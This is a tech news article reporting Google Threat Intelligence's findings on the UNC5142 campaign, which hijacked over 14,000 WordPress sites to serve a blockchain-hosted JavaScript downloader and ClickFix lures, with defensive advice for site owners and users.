- More than 14,000 WordPress sites were hacked to deliver malware
- Attackers installed a JavaScript downloader that fetches payloads from the blockchain
- Victims are lured into running commands manually via a “ClickFix” landing page
- Use of blockchain makes detection and takedown much harder
A newly uncovered campaign has seen more than fourteen thousand WordPress websites hijacked and turned into malware distribution hubs.
According to Google’s Threat Intelligence team, a hacking group called UNC5142 is behind the mass attack. The sites were altered to run malicious scripts that secretly install malware on visitor machines.
How the Attack Operated Through Blockchain
The hackers installed a multi-step JavaScript downloader, which they call CLEARSHOT, on targeted WordPress sites. That downloader does not fetch malware from a normal web address.
Instead, it retrieves part of its instructions from the public blockchain. In their investigation, Google found many payloads hosted on the BNB chain. By using blockchain for delivery, the attackers made their setup harder to dismantle and detect.
Once CLEARSHOT gets its data, it launches a second stage. That stage delivers a landing page known as CLEARSHORT. That page is crafted to trick users into running commands manually. It tells visitors to copy and paste a shell command into Windows’ Run or macOS’s Terminal. Once executed, the code pulls down the actual malware.
Social Engineering with “ClickFix” Tactics
The method used to trick victims is called ClickFix. On the landing page, users are urged to act fast or fix a system issue. They are shown instructions like “paste this command now.” The landing page is encrypted and often hosted on Cloudflare-controlled .dev domains. Because the instructions are clear and time-sensitive, many users fall for it, especially when they believe their computer has a problem.
In effect, the infected WordPress site functions as a launchpad. It passes the malicious downloader to visitors. The downloader then connects via blockchain to fetch its payload. Finally it lures users into executing code that installs malware.
Why This Attack Stands Out
What makes this campaign especially dangerous is its combination of scale, stealth, and resilience. Over fourteen thousand sites were compromised. Many belonged to smaller or less maintained WordPress installations that relied on plugins, themes, or configurations with weak security.
The use of blockchain gives attackers a durable infrastructure. Because blockchains are immutable, once a payload is stored, it cannot easily be taken down or modified. Traditional takedown efforts are less effective. Also, traffic that originates from Web3 sources can evade standard network filters that expect typical URLs or IP patterns.
Google has observed that the UNC5142 group seemed active from late 2023 until July 2025. The team’s report says it is unclear whether the group has disbanded or adopted new methods. But they believe it may still be active under the radar, refining obfuscation techniques and hiding command delivery.
What Site Owners and Users Should Watch
Site owners should audit plugins, themes, and WordPress core files. Many of the compromised sites were likely unpatched or using vulnerable extensions. Keeping everything up to date can help reduce risk.
Users should never paste unknown commands into system prompts. Legitimate sites rarely ask you to run shell or command line operations. If you encounter a prompt that demands immediate code entry, treat it as suspicious.
Security teams should monitor unusual JavaScript behavior, especially code that retrieves scripts from blockchain sources or external servers. Combining traditional web threat detection with newer Web3-aware defenses may help counter attacks that leverage decentralized systems.
Follow TechBSB For More Updates
